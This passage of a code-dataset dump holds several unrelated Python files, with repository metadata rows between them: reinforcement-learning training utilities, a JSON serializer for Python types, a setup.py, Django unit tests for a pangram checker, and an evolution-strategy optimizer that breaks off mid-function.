    """
    This returns the distance according to the implementation of env
    For instance, halfcheetah and humanoid have the different way to return the distance
    so that we need to deal with them accordingly.

    :param env_name: Gym env id, e.g. "HalfCheetah-v2"
    :return: func(action, reward, info) -> float distance for one step
    :raises ValueError: for unsupported envs (was an ``assert`` before,
        which disappears under ``python -O``)
    """
    # `in` replaces the previous `not s.find(x) == -1` substring checks.
    obj_name = env_name.split("-")[0]
    if "Ant" in obj_name:
        def func(action, reward, info):
            # https://github.com/openai/gym/blob/master/gym/envs/mujoco/ant.py#L14
            distance = info["reward_forward"]
            return distance
    elif "HalfCheetah" in obj_name:
        def func(action, reward, info):
            # https://github.com/openai/gym/blob/master/gym/envs/mujoco/half_cheetah.py
            distance = info["reward_run"]
            return distance
    elif "Hopper" in obj_name:
        def func(action, reward, info):
            # https://github.com/openai/gym/blob/master/gym/envs/mujoco/hopper.py#L15
            # Invert the reward formula: remove the alive bonus and re-add
            # the control cost to recover the raw forward distance term.
            distance = (reward - ALIVE_BONUS) + 1e-3 * np.square(action).sum()
            return distance
    elif "Humanoid" in obj_name:
        def func(action, reward, info):
            # https://github.com/openai/gym/blob/master/gym/envs/mujoco/humanoid.py#L30
            distance = info["reward_linvel"] / 1.25
            return distance
    elif "Swimmer" in obj_name:
        def func(action, reward, info):
            # https://github.com/openai/gym/blob/master/gym/envs/mujoco/swimmer.py#L15
            distance = info["reward_fwd"]
            return distance
    elif "Walker2d" in obj_name:
        def func(action, reward, info):
            # https://github.com/openai/gym/blob/master/gym/envs/mujoco/walker2d.py#L16 -> original version
            distance = (reward - ALIVE_BONUS) + 1e-3 * np.square(action).sum()
            # https://github.com/openai/gym/blob/master/gym/envs/mujoco/walker2d_v3.py#L90 -> version 3.0
            # distance = info["x_velocity"]
            return distance
    elif "Centipede" in obj_name:
        def func(action, reward, info):
            distance = info["reward_forward"]
            return distance
    else:
        raise ValueError("This env: {} is not supported yet.".format(env_name))
    return func
"""
TODO: I think I will remove this.
# Copyright 2018 The Dopamine Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
===== Tracker is A class for storing iteration-specific metrics. ====
"""
class Tracker(object):
    """A class for storing iteration-specific metrics.

    Maintains a mapping from metric name (str) to the list of values recorded
    for that metric across episodes, e.g. data_lists['train_episode_returns']
    might contain the per-episode returns achieved during this iteration.

    Attributes:
        data_lists: dict mapping each metric_name (str) to a list of said
            metric across episodes.
    """

    def __init__(self):
        self.data_lists = {}

    def append(self, data_pairs):
        """Add the given values to their corresponding key-indexed lists.

        Args:
            data_pairs: A dictionary of key-value pairs to be recorded.
        """
        for metric_name, metric_value in data_pairs.items():
            self.data_lists.setdefault(metric_name, []).append(metric_value)
"""
Update methods
"""
def sync_main_target(sess, target, source):
    """
    Synchronise the models: hard-copy every trainable variable of `source`
    into `target`.

    from Denny Britz's excellent RL repo
    https://github.com/dennybritz/reinforcement-learning/blob/master/DQN/Double%20DQN%20Solution.ipynb

    :param sess: tf.Session to run the assign ops in
    :param target: network whose weights are overwritten (exposes `.scope`)
    :param source: network whose weights are copied (exposes `.scope`)
    :return:
    """
    # Collect both scopes' variables and sort by name so they pair up 1:1.
    source_params = [t for t in tf.trainable_variables() if t.name.startswith(source.scope)]
    source_params = sorted(source_params, key=lambda v: v.name)
    target_params = [t for t in tf.trainable_variables() if t.name.startswith(target.scope)]
    target_params = sorted(target_params, key=lambda v: v.name)
    update_ops = []
    for target_w, source_w in zip(target_params, source_params):
        op = target_w.assign(source_w)
        update_ops.append(op)
    # Run all assignments in a single session call.
    sess.run(update_ops)
def soft_target_model_update(sess, target, source, tau=1e-2):
    """
    Soft update model parameters.
    target = tau * source + (1 - tau) * target

    :param sess: tf.Session to run the assign ops in
    :param target: network whose weights are interpolated towards `source`
    :param source: network providing the new weights (exposes `.scope`)
    :param tau: interpolation coefficient (1.0 would be a hard copy)
    :return:
    """
    # Collect both scopes' variables and sort by name so they pair up 1:1.
    source_params = [t for t in tf.trainable_variables() if t.name.startswith(source.scope)]
    source_params = sorted(source_params, key=lambda v: v.name)
    target_params = [t for t in tf.trainable_variables() if t.name.startswith(target.scope)]
    target_params = sorted(target_params, key=lambda v: v.name)
    update_ops = []
    for target_w, source_w in zip(target_params, source_params):
        # target = tau * source + (1 - tau) * target
        op = target_w.assign(tau * source_w + (1 - tau) * target_w)
        update_ops.append(op)
    sess.run(update_ops)
@tf.contrib.eager.defun(autograph=False)
def soft_target_model_update_eager(target, source, tau=1e-2):
    """
    Soft update model parameters (eager/defun version).
    target = tau * source + (1 - tau) * target

    :param target: Keras model whose weights are updated in place
    :param source: Keras model providing the new weights
    :param tau: interpolation coefficient (1.0 would be a hard copy)
    :return:
    """
    # `.weights` pairs up 1:1 because both models share the same architecture.
    for param, target_param in zip(source.weights, target.weights):
        target_param.assign(tau * param + (1 - tau) * target_param)
"""
Gradient Clipping
"""
def gradient_clip_fn(flag=None):
    """
    given a flag, create the clipping function and returns it as a function
    currently it supports:
        - by_value  : clip each gradient into [-1, 1]
        - norm      : clip by global norm 10.0
        - None / "" : no clipping (identity)

    :param flag: one of "by_value", "norm", "" or None
    :return: function mapping a list of gradients to a list of gradients
    :raises ValueError: for any other flag (was an ``assert`` before)
    """
    if flag is None or flag == "":
        # BUGFIX: the default flag=None previously crashed on the assert
        # below even though the docstring advertised None as supported.
        def _func(grads):
            return grads
    elif flag == "by_value":
        def _func(grads):
            grads = [ClipIfNotNone(grad, -1., 1.) for grad in grads]
            return grads
    elif flag == "norm":
        def _func(grads):
            grads, _ = tf.clip_by_global_norm(grads, 10.0)
            return grads
    else:
        raise ValueError("Choose the gradient clipping function from by_value, norm, or nothing!")
    return _func
def ClipIfNotNone(grad, _min, _max):
    """
    Clip ``grad`` into [_min, _max], passing None gradients straight through.

    Reference: https://stackoverflow.com/a/39295309
    """
    return grad if grad is None else tf.clip_by_value(grad, _min, _max)
"""
Test Methods
"""
def eval_Agent(agent, env, n_trial=1):
    """
    Evaluate the trained agent with a fixed 0.05 epsilon-greedy policy
    (following the DQN Nature paper), log scores to TensorBoard and, on
    Colab, back the logs/models up to the mounted MyDrive.

    :param agent: agent exposing `predict`, `num_action`, `index_timestep`, `params`
    :param env: gym-style environment
    :param n_trial: number of evaluation episodes
    :return:
    """
    all_rewards = list()
    print("=== Evaluation Mode ===")
    for ep in range(n_trial):
        state = env.reset()
        done = False
        episode_reward = 0
        while not done:
            # epsilon-greedy for evaluation using a fixed epsilon of 0.05(Nature does this!)
            if np.random.uniform() < 0.05:
                action = np.random.randint(agent.num_action)
            else:
                action = np.argmax(agent.predict(state))
            next_state, reward, done, _ = env.step(action)
            state = next_state
            episode_reward += reward
        all_rewards.append(episode_reward)
        tf.contrib.summary.scalar("Evaluation Score", episode_reward, step=agent.index_timestep)
        print("| Ep: {}/{} | Score: {} |".format(ep + 1, n_trial, episode_reward))
    # if this is running on Google Colab, we would store the log/models to mounted MyDrive
    if agent.params.google_colab:
        delete_files(agent.params.model_dir_colab)
        delete_files(agent.params.log_dir_colab)
        copy_dir(agent.params.log_dir, agent.params.log_dir_colab)
        copy_dir(agent.params.model_dir, agent.params.model_dir_colab)
    if n_trial > 2:
        print("=== Evaluation Result ===")
        all_rewards = np.array([all_rewards])
        print("| Max: {} | Min: {} | STD: {} | MEAN: {} |".format(np.max(all_rewards), np.min(all_rewards),
                                                                  np.std(all_rewards), np.mean(all_rewards)))
def eval_Agent_DDPG(env, agent, n_trial=1):
    """
    Evaluate the trained DDPG agent with the recording of its behaviour,
    tracking travelled distance and mean-squared action magnitude per step.

    :param env: env wrapper exposing record_start()/record_end() and action_space
    :param agent: agent exposing `eval_predict`, `params`, `index_timestep`
    :param n_trial: number of evaluation episodes
    :return: (all_rewards, all_distances, all_actions) per-episode / per-step lists
    """
    all_distances, all_rewards, all_actions = list(), list(), list()
    distance_func = get_distance(agent.params.env_name)  # create the distance measure func
    print("=== Evaluation Mode ===")
    for ep in range(n_trial):
        env.record_start()
        state = env.reset()
        done = False
        episode_reward = 0
        while not done:
            action = agent.eval_predict(state)
            # scale for execution in env (in DDPG, every action is clipped between [-1, 1] in agent.predict)
            next_state, reward, done, info = env.step(action * env.action_space.high)
            distance = distance_func(action, reward, info)
            all_actions.append(action.mean() ** 2)  # Mean Squared of action values
            all_distances.append(distance)
            state = next_state
            episode_reward += reward
        all_rewards.append(episode_reward)
        tf.contrib.summary.scalar("Evaluation Score", episode_reward, step=agent.index_timestep)
        print("| Ep: {}/{} | Score: {} |".format(ep + 1, n_trial, episode_reward))
        env.record_end()
    return all_rewards, all_distances, all_actions
def eval_Agent_TRPO(agent, env, n_trial=1):
    """
    Evaluate the trained TRPO agent greedily and log scores to TensorBoard.

    :param agent: agent exposing `predict` and `index_timestep`
    :param env: gym-style environment
    :param n_trial: number of evaluation episodes
    :return:
    """
    all_rewards = list()
    print("=== Evaluation Mode ===")
    for ep in range(n_trial):
        state = env.reset()
        done = False
        episode_reward = 0
        while not done:
            action = agent.predict(state)
            # scale for execution in env (in DDPG, every action is clipped between [-1, 1] in agent.predict)
            next_state, reward, done, _ = env.step(action)
            state = next_state
            episode_reward += reward
        all_rewards.append(episode_reward)
        tf.contrib.summary.scalar("Evaluation Score", episode_reward, step=agent.index_timestep)
        print("| Ep: {}/{} | Score: {} |".format(ep + 1, n_trial, episode_reward))
    if n_trial > 2:
        print("=== Evaluation Result ===")
        all_rewards = np.array([all_rewards])
        print("| Max: {} | Min: {} | STD: {} | MEAN: {} |".format(np.max(all_rewards), np.min(all_rewards),
                                                                  np.std(all_rewards), np.mean(all_rewards)))
def eval_Agent_HER(agent, env, n_trial=1):
    """
    Evaluate a HER agent and return its mean per-step success rate.

    :param agent: agent exposing `predict(obs, goal)` and `params.num_steps`
    :param env: goal-based gym environment (dict observations)
    :param n_trial: number of evaluation episodes
    :return: mean of the per-step `is_success` flags over all episodes
    """
    successes = list()
    for ep in range(n_trial):
        state = env.reset()
        # obs, achieved_goal, desired_goal in `numpy.ndarray`
        obs, ag, dg, rg = state_unpacker(state)
        success = list()
        for ts in range(agent.params.num_steps):
            # env.render()
            action = agent.predict(obs, dg)
            # action = action_postprocessing(action, agent.params)
            next_state, reward, done, info = env.step(action)
            success.append(info.get('is_success'))
            # obs, achieved_goal, desired_goal in `numpy.ndarray`
            next_obs, next_ag, next_dg, next_rg = state_unpacker(next_state)
            obs = next_obs
            dg = next_dg
        successes.append(success)
    return np.mean(np.array(successes))
| 35.745953 | 162 | 0.610089 |
3a8780a44ac5da348e337c07269fb06faa67e8cd | 2,284 | py | Python | common/serializers.py | kollad/turbo-ninja | 9c3f66b2af64aec01f522d19b309cfdd723e67cf | [
"MIT"
] | null | null | null | common/serializers.py | kollad/turbo-ninja | 9c3f66b2af64aec01f522d19b309cfdd723e67cf | [
"MIT"
] | 1 | 2017-12-14T05:35:38.000Z | 2017-12-14T05:35:38.000Z | common/serializers.py | kollad/turbo-ninja | 9c3f66b2af64aec01f522d19b309cfdd723e67cf | [
"MIT"
] | null | null | null | from collections import namedtuple, OrderedDict
import json
__author__ = 'kollad'
def isnamedtuple(obj):
    """Heuristic check if an object is a namedtuple."""
    return isinstance(obj, tuple) \
        and hasattr(obj, "_fields") \
        and hasattr(obj, "_asdict") \
        and callable(obj._asdict)


def serialize(data):
    """Recursively convert *data* into a JSON-serializable structure.

    JSON-native values pass through unchanged; tuples, sets, namedtuples,
    OrderedDicts, dicts with non-string keys and numpy arrays are wrapped in
    tagged ``{"py/...": ...}`` dicts that ``restore`` understands.

    :raises TypeError: for any unsupported type.
    """
    import numpy as np  # BUGFIX: `np` was used below without being imported

    if data is None or isinstance(data, (bool, int, float, str)):
        return data
    if isinstance(data, list):
        return [serialize(val) for val in data]
    if isinstance(data, OrderedDict):
        return {"py/collections.OrderedDict":
                    [[serialize(k), serialize(v)] for k, v in data.items()]}
    if isnamedtuple(data):
        return {"py/collections.namedtuple": {
            "type": type(data).__name__,
            "fields": list(data._fields),
            "values": [serialize(getattr(data, f)) for f in data._fields]}}
    if isinstance(data, dict):
        # A plain JSON object is only possible when every key is a string.
        if all(isinstance(k, str) for k in data):
            return {k: serialize(v) for k, v in data.items()}
        return {"py/dict": [[serialize(k), serialize(v)] for k, v in data.items()]}
    if isinstance(data, tuple):
        return {"py/tuple": [serialize(val) for val in data]}
    if isinstance(data, set):
        return {"py/set": [serialize(val) for val in data]}
    if isinstance(data, np.ndarray):
        return {"py/numpy.ndarray": {
            "values": data.tolist(),
            "dtype": str(data.dtype)}}
    raise TypeError("Type %s not data-serializable" % type(data))
def restore(dct):
    """Inverse of ``serialize``: rebuild Python objects from tagged dicts.

    Intended for use as a ``json.loads`` object_hook; dicts without a
    recognised ``py/...`` tag are returned unchanged.
    """
    import numpy as np  # BUGFIX: `np` was used below without being imported

    if "py/dict" in dct:
        return dict(dct["py/dict"])
    if "py/tuple" in dct:
        return tuple(dct["py/tuple"])
    if "py/set" in dct:
        return set(dct["py/set"])
    if "py/collections.namedtuple" in dct:
        data = dct["py/collections.namedtuple"]
        return namedtuple(data["type"], data["fields"])(*data["values"])
    if "py/numpy.ndarray" in dct:
        data = dct["py/numpy.ndarray"]
        return np.array(data["values"], dtype=data["dtype"])
    if "py/collections.OrderedDict" in dct:
        return OrderedDict(dct["py/collections.OrderedDict"])
    return dct
def data_to_json(data):
    """Serialize *data* (see ``serialize``) and dump it as a JSON string."""
    encodable = serialize(data)
    return json.dumps(encodable)
def json_to_data(s):
    """Parse a JSON string produced by ``data_to_json`` back into Python data."""
    decoded = json.loads(s, object_hook=restore)
    return decoded
3a8812b8a7ce8889a96abd8e38c4d8b8f1956ab6 | 1,079 | py | Python | setup.py | mjw99/Musketeer | 0299a7974ad90c09d8d9206fcf862e45f9fddf30 | [
"MIT"
] | null | null | null | setup.py | mjw99/Musketeer | 0299a7974ad90c09d8d9206fcf862e45f9fddf30 | [
"MIT"
] | null | null | null | setup.py | mjw99/Musketeer | 0299a7974ad90c09d8d9206fcf862e45f9fddf30 | [
"MIT"
] | null | null | null | import setuptools
# Use the README as the long description rendered on PyPI.
with open("README.md") as readmeFile:
    long_description = readmeFile.read()

setuptools.setup(
    name="musketeer",
    version="0.0.1",
    author="Daniil Soloviev",
    author_email="dos23@cam.ac.uk",
    description="A tool for fitting data from titration experiments.",
    long_description=long_description,
    long_description_content_type='text/markdown',
    classifiers=[
        "Development Status :: 3 - Alpha",
        "Intended Audience :: End Users/Desktop",
        "Intended Audience :: Science/Research",
        "License :: OSI Approved :: MIT License",
        "Operating System :: OS Independent",
        "Programming Language :: Python :: 3",
        "Topic :: Scientific/Engineering :: Chemistry"
    ],
    url="https://github.com/daniilS/Musketeer",
    packages=["musketeer"],
    # ship bundled image assets (icons) inside the package
    package_data={"": ["*.png"]},
    include_package_data=True,
    install_requires=[
        "numpy",
        "scipy",
        "matplotlib",
        "ttkbootstrap",
        "tkscrolledframe",
        "ttkwidgets"
    ],
    python_requires=">=3"
)
3a886dc473f6df44d24e2498829541fd798461f5 | 1,358 | py | Python | webapp/tests.py | carolFrohlich/string_checker | 27a96ab9a315d47304b0eb6bdfd671be7a34b6f1 | [
"MIT"
] | null | null | null | webapp/tests.py | carolFrohlich/string_checker | 27a96ab9a315d47304b0eb6bdfd671be7a34b6f1 | [
"MIT"
] | null | null | null | webapp/tests.py | carolFrohlich/string_checker | 27a96ab9a315d47304b0eb6bdfd671be7a34b6f1 | [
"MIT"
] | null | null | null | from django.test import TestCase
# Create your tests here.
from webapp.forms import contains_all_letters
class SCheckerTestCase(TestCase):
    """Unit tests for contains_all_letters (pangram detection)."""

    def setup(self):
        # NOTE(review): Django/unittest invokes `setUp` (capital U); this
        # lower-case `setup` is never called by the test runner — confirm intent.
        pass

    def test_lower_case(self):
        text = 'abcdefghijklmnopqrstuvwxyz'
        answer = contains_all_letters(text)
        self.assertEqual(answer,True)

    def test_upper_case(self):
        text = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'
        answer = contains_all_letters(text)
        self.assertEqual(answer,True)

    def test_mixed_case(self):
        text = 'ABCDEFGHijkLMNOPQRSTUVWXYZ'
        answer = contains_all_letters(text)
        self.assertEqual(answer,True)

    def test_special_chars(self):
        # all 26 letters present, interleaved with punctuation/digits
        text = 'abc...DEFGHIJK///LMNOP QR2STU:V""WXYZ'
        answer = contains_all_letters(text)
        self.assertEqual(answer,True)

    def test_sentence(self):
        # classic pangram
        text = 'The quick brown fox jumps over the lazy dog'
        answer = contains_all_letters(text)
        self.assertEqual(answer,True)

    def test_missing_letter(self):
        # P is missing
        text = 'abc...DEFGHIJK///LMNO QR2STU:V""WXYZ'
        answer = contains_all_letters(text)
        self.assertEqual(answer,False)

    def test_empty(self):
        # an empty string contains no letters at all (comment was a copy-paste error)
        text = ''
        answer = contains_all_letters(text)
        self.assertEqual(answer,False)

    def test_just_special_chars(self):
        # no alphabetic characters at all (comment was a copy-paste error)
        text = '!@#$%^&*()-=<>?{}|;/.,78900-=<>?{}|;/.,78900'
        answer = contains_all_letters(text)
        self.assertEqual(answer,False)
3a89f586494444a77daa3b34a1bc45b72a73f85e | 16,338 | py | Python | EvolutiveStrategies.py | ignacioct/GeneticAlgorithms | 6a92c3d5ec6f2796333576d93c3b6b421055b7a4 | [
"MIT"
] | 4 | 2020-11-26T16:18:23.000Z | 2021-06-28T08:43:35.000Z | EvolutiveStrategies.py | ignacioct/GeneticAlgorithms | 6a92c3d5ec6f2796333576d93c3b6b421055b7a4 | [
"MIT"
] | null | null | null | EvolutiveStrategies.py | ignacioct/GeneticAlgorithms | 6a92c3d5ec6f2796333576d93c3b6b421055b7a4 | [
"MIT"
] | null | null | null | import copy
import math
import operator
import random
import sys
from concurrent import futures
import numpy as np
import requests
class FitnessFunctionCaller:
    """Wraps one fitness evaluation of an individual.

    This is a placeholder: ``call`` always returns ``1`` until a real
    fitness function (e.g. a robot-simulation request) is plugged in.
    """

    def __init__(self, *args):
        # Positional args are the functional (motor-angle) values of the
        # individual being evaluated.  Bug fix: the original built this
        # list into a local variable and then discarded it; keep it on the
        # instance so ``call`` can actually use it once implemented.
        self.functional_parts = list(args)

    def call(self) -> float:
        """Return the fitness value for the stored functional parts."""
        return 1  # Fitness function placeholder
class Individual:
    """Candidate solution: a vector of motor angles (``functional``) plus a
    per-angle mutation step size (``variance``)."""

    def __init__(self, is10, **kwargs):
        functional = kwargs.get("functional", None)
        variance = kwargs.get("variance", None)

        self.is10 = is10
        # A "10" individual drives ten motors; only an explicit ``False``
        # selects the four-motor variant (mirrors the original check).
        self.motorNumber = 4 if is10 is False else 10

        if kwargs:
            # Caller supplied an explicit genome: adopt it verbatim.
            self.functional = functional
            self.variance = variance
        else:
            # Fresh random genome: angles in [-180, 181), step sizes in [100, 360).
            self.functional = [
                np.random.uniform(-180, 181) for _ in range(self.motorNumber)
            ]
            self.variance = [
                np.random.uniform(100, 360) for _ in range(self.motorNumber)
            ]

        self.fitness = sys.float_info.max  # sentinel: "not evaluated yet"

    def update_fitness(self, incoming):
        """Overwrite the cached fitness value."""
        self.fitness = incoming

    def update_variance(self, incoming):
        """Copy the incoming step sizes element-wise into this individual."""
        for idx in range(self.motorNumber):
            self.variance[idx] = incoming[idx]
class EvolutiveStrategyOneIndividual:
    """(1+1) evolution strategy: a single parent produces one mutated child
    per generation and the better of the two survives, with step sizes
    controlled by Rechenberg's 1/5 success rule."""

    def __init__(self, c, is10):
        self.population = 1
        self.pool = []
        for _ in range(self.population):  # reusable for bigger populations
            indv = Individual(is10)
            self.pool.append(indv)
        self.successes = []  # 1 if the child improved on the parent, else 0
        # psi: ratio of improvements over the last 10 generations
        self.psi = self.successes.count(1) / 10
        self.c = c  # coefficient (expected 0 < c < 1) for the 1/5 rule
        self.evaluations = 0
        self.lastFitness = sys.float_info.max  # sentinel high value

    def mutation(self):
        """Create a temporary child by adding Gaussian noise (scaled by the
        per-gene variance) to every functional value of the parent."""
        self.temporalPool = []
        temporal_functional = []
        for i in range(self.pool[0].motorNumber):
            temporal_functional.append(
                self.pool[0].functional[i]
                + np.random.normal(scale=self.pool[0].variance[i])
            )
        temp_indv = Individual(
            is10=self.pool[0].is10,
            functional=temporal_functional,
            variance=self.pool[0].variance,
        )
        self.temporalPool.append(temp_indv)

    def evaluation(self):
        """Evaluate parent and child, keep the better one (lower fitness wins,
        ties favour the parent), adapt the step sizes and log the outcome."""
        formerIndividualCaller = FitnessFunctionCaller(*(i for i in self.pool[0].functional))
        temporalIndividualCaller = FitnessFunctionCaller(
            *(i for i in self.temporalPool[0].functional)
        )
        formerIndividualFitness = formerIndividualCaller.call()
        temporalIndividualFitness = temporalIndividualCaller.call()
        self.evaluations += 2
        # formerBetter is True if the mutation did not improve on the parent.
        formerBetter = formerIndividualFitness <= temporalIndividualFitness
        bestFitness = min(formerIndividualFitness, temporalIndividualFitness)
        # If the child improved, it replaces the parent.
        if not formerBetter:
            self.pool = copy.deepcopy(self.temporalPool)
        # In any case, the temporal pool is consumed at this point.
        del self.temporalPool
        # Adapt every step size with the 1/5 success rule (before recording
        # this generation's outcome, matching the original update order).
        for i in range(self.pool[0].motorNumber):
            self.pool[0].variance[i] = self.ruleOneFifth(self.pool[0].variance[i])
        self.pool[0].update_fitness(bestFitness)
        # Record the outcome in a sliding window of the last 10 generations.
        if len(self.successes) >= 10:
            self.successes.pop(0)
        self.successes.append(0 if formerBetter else 1)
        self.lastFitness = bestFitness
        self.psi = self.successes.count(1) / 10

    def trainingLoop(self, maxCycles):
        """Run at most ``maxCycles`` generations, stopping early once any
        step size collapses below 1e-4 (mutation has effectively frozen)."""
        # Bug fix: the original re-created this list on every iteration, so
        # the rolling 10-generation log never accumulated anything.
        formerResults = []
        for cycle in range(maxCycles):
            self.mutation()
            self.evaluation()
            if len(formerResults) > 10:
                formerResults.pop(0)
            report = (
                "Generation: "
                + str(cycle)
                + "\tBest fitness: "
                + str(self.pool[0].fitness)
                + "\nBest chromosome: "
                + str(self.pool[0].functional)
            )
            formerResults.append(report)
            print(report)
            # Early stopping: a near-zero variance means the search converged.
            stopping = False
            for i in range(len(self.pool[0].functional)):
                if self.pool[0].variance[i] < 0.0001:
                    stopping = True
            if stopping:
                print("Early stopping applied")
                print(formerResults[0])
                break

    def ruleOneFifth(self, formerVariance) -> float:
        """Apply Rechenberg's 1/5 success rule to one step size.

        If fewer than 1/5 of the recent mutations succeeded, shrink the step
        (multiply by ``c`` < 1); if more than 1/5 succeeded, grow it (divide
        by ``c``); at exactly 1/5, leave it unchanged.

        Bug fix: the original grow branch returned ``self.c / formerVariance``,
        which inverts the variance instead of scaling it up.
        """
        self.psi = (
            self.successes.count(1) / 10
        )  # ratio of improvement in the last 10 generations
        if self.psi < 0.2:
            return self.c * formerVariance
        elif self.psi > 0.2:
            return formerVariance / self.c
        else:
            return formerVariance
class EvolutiveStrategyMultiple:
    """(mu + lambda)-style evolution strategy over a population of individuals.

    Parents are chosen by tournament, recombination averages ``family_number``
    parents per child, and step sizes self-adapt via log-normal mutation.
    Lower fitness is better throughout.
    """
    def __init__(self, population, family_number, tournament_factor, is10):
        # Number of individuals kept between generations (mu).
        self.population = population
        self.pool = []
        for _ in range(self.population):
            indv = Individual(is10)
            self.pool.append(indv)
        # How many parents are averaged to produce each child.
        self.family_number = family_number
        # Learning rates for log-normal step-size self-adaptation:
        # per-coordinate tau = 1/sqrt(2*sqrt(n)), global zero_tau = 1/sqrt(2n).
        self.tau = 1 / math.sqrt(2 * math.sqrt(self.pool[0].motorNumber))
        self.zero_tau = 1 / math.sqrt(2 * self.pool[0].motorNumber)
        # Fraction of the population entering each tournament round.
        self.tournament_factor = tournament_factor
        # Total number of fitness evaluations performed so far.
        self.evaluations = 0
    def element_per_list(self, lista):
        """Auxiliary helper: given ``family_number`` equally sized inner lists,
        build one list taking, for each position, the value at that position
        from a randomly chosen inner list."""
        temporal_list = []
        for position in range(len(lista[0])):
            rnd = random.randint(0, (self.family_number - 1))
            temporal_list.append(lista[rnd][position])
        return temporal_list
    def tournament(self):
        """
        Selects parents by repeatedly sampling a random subset of the pool and
        keeping the fittest member of each subset (lowest fitness wins).
        Returns family_number * population parents (repetition is possible).
        """
        len_population = self.family_number * self.population
        temp_population = []  # Temporal place for the newly-created population
        for _ in range(len_population):
            # Get tournament size as the floored integer of the Population Size * Tournament Percentage (aka factor)
            tournament_size = math.floor(self.tournament_factor * self.population)
            # Selects a random fraction of the total population to participate in the tournament
            tournament_selected = random.sample(range(self.population), tournament_size)
            # Choose the fittest
            fitnesses = []
            indexes = []
            for index in tournament_selected:
                fitnesses.append(self.pool[index].fitness)
                indexes.append(index)
            fittest_index = indexes[fitnesses.index(min(fitnesses))]
            fittest = self.pool[fittest_index]
            temp_population.append(fittest)
        return temp_population  # Returning the new population
    def crossover(self, pool):
        """Returns a pool of children, given the pool of selected parents.

        Consecutive groups of ``family_number`` parents form a family; each
        family produces one child whose functionals are the parents' averages
        and whose variances are picked position-wise from a random parent.
        """
        temporal_pool = []
        random.shuffle(pool)  # randomize the pool of individuals, to randomize crossover
        counter = 0  # controls the loops logic
        avg_functionals = [0] * pool[0].motorNumber  # functional list for the newborns (must be restarted with 0-init)
        avg_variances = ([])  # variances list for the newborns (must be restarted by recasting)
        for indv in pool:
            if counter != (self.family_number - 1):  # not the last member of the family
                for position in range(indv.motorNumber):
                    avg_functionals[position] += indv.functional[position]  # adds each functional of the current ind to corresponding positions
                avg_variances.append(indv.variance)  # adds the variance to the list of parent variances
                counter += 1
            else:  # last member of the family -> extra functions
                for position in range(indv.motorNumber):
                    avg_functionals[position] += indv.functional[position]
                    avg_functionals[
                        position
                    ] /= (
                        self.family_number
                    )  # no more sums left, time to divide by family number
                avg_variances.append(indv.variance)
                # Transforming the list of lists to a list of variances, with a random variance of the parents for each position
                avg_variances = self.element_per_list(avg_variances)
                # Adding the individual to the temporal pool
                temp_indv = Individual(
                    is10=pool[0].is10,
                    functional=avg_functionals,
                    variance=avg_variances,
                )
                temporal_pool.append(temp_indv)
                # Restarting variables, as this family has finished
                counter = 0
                avg_functionals = [0] * pool[0].motorNumber
                avg_variances = []
        """
        With this implementation, if population mod family number is not zero, those parents at the end wont create any child.
        To cope with that, the parents pool is shuffled. This should not be a problem, just 1 or 2 will be excluded.
        At the end, we get the same number of children, so the rest of the operators remain unchanged, and convergence will work just fine.
        """
        return temporal_pool
    def mutation(self, pool, scaling):
        """
        Given a pool of individuals, mutates all of them in place.
        Functionals get Gaussian noise scaled by their own variance;
        variances self-adapt by log-normal perturbation (with an extra
        global factor when ``scaling`` is True).
        """
        for individual in pool:
            for i in range(individual.motorNumber):
                # Functional mutation
                individual.functional[i] += np.random.normal(
                    loc=0, scale=individual.variance[i]
                )
                # Variance mutation
                if scaling is True:
                    individual.variance[i] = (
                        individual.variance[i]
                        * np.exp(np.random.normal(loc=0, scale=self.tau))
                        * np.exp(np.random.normal(loc=0, scale=self.zero_tau))
                    )
                else:
                    individual.variance[i] = individual.variance[i] * np.exp(
                        np.random.normal(loc=0, scale=self.tau)
                    )
        return pool
    def concurrent_evaluation(self, pool):
        """Given a pool of individuals, return the list of their fitness
        values, evaluated concurrently on a thread pool."""
        callers = []  # list of caller objects of individuals
        for individual in pool:
            individual_caller = FitnessFunctionCaller(*(i for i in individual.functional))
            callers.append(individual_caller)
        with futures.ThreadPoolExecutor(max_workers=50) as execute:
            future = [execute.submit(callers[i].call) for i in range(len(pool))]
            self.evaluations += len(future)
            fitnesses = [f.result() for f in future]  # list of fitness of the pool
        return fitnesses
    def selection(self, children_pool):
        """Given a pool of mutated children, and using self.pool (the parents'
        pool), keeps the ``self.population`` best of parents + children."""
        fitnesses = []
        combined_pool = copy.deepcopy(
            self.pool
        )  # introducing parents to a combined pool
        combined_pool.extend(children_pool)  # introducing childs to a combined pool
        for i in range(len(self.pool)):
            fitnesses.append(self.pool[i].fitness)
        fitnesses.extend(
            self.concurrent_evaluation(children_pool)
        )  # list of fitnesses of the combined pool
        for i in range(len(combined_pool)):
            combined_pool[i].fitness = fitnesses[i]
        combined_pool.sort(key=operator.attrgetter("fitness"))
        # ordered_combined_pool = [x for _,x in sorted(zip(fitnesses, combined_pool))] # Population ordered by fitness
        self.pool = copy.deepcopy(combined_pool[: self.population])  # The pool will now be the best individuals of both parents and children
        # Re-assign the (sorted) best fitness values onto the surviving pool.
        fitnesses.sort()
        for i in range(len(self.pool)):
            self.pool[i].fitness = fitnesses[i]
        return
    def training_cycle(self, max_cycles, scaling):
        """Training loop: tournament -> crossover -> mutation -> selection,
        bounded by ``max_cycles`` generations; stops early on perfect fitness."""
        # Initial evaluation of the starting population.
        fitnesses = self.concurrent_evaluation(self.pool)
        for i in range(len(self.pool)):
            self.pool[i].fitness = fitnesses[i]
        for cycle in range(max_cycles):
            temp_pool = self.tournament()
            temp_pool = self.crossover(temp_pool)
            temp_pool = self.mutation(temp_pool, scaling)
            self.selection(temp_pool)
            print(
                "Generation: "
                + str(cycle)
                + "\t Evaluation: "
                + str(self.evaluations)
                + "\tBest fitness: "
                + str(self.pool[0].fitness)
                + "\nBest chromosome: "
                + str(self.pool[0].functional)
                + "\n"
                + str(self.pool[0].variance)
            )
            # Perfect fitness reached: stop early.
            if self.pool[0].fitness == 0.0:
                print("Early stopping applied")
                print(
                    "Generation: "
                    + str(cycle)
                    + "\t Evaluation: "
                    + str(self.evaluations)
                    + "\tBest fitness: "
                    + str(self.pool[0].fitness)
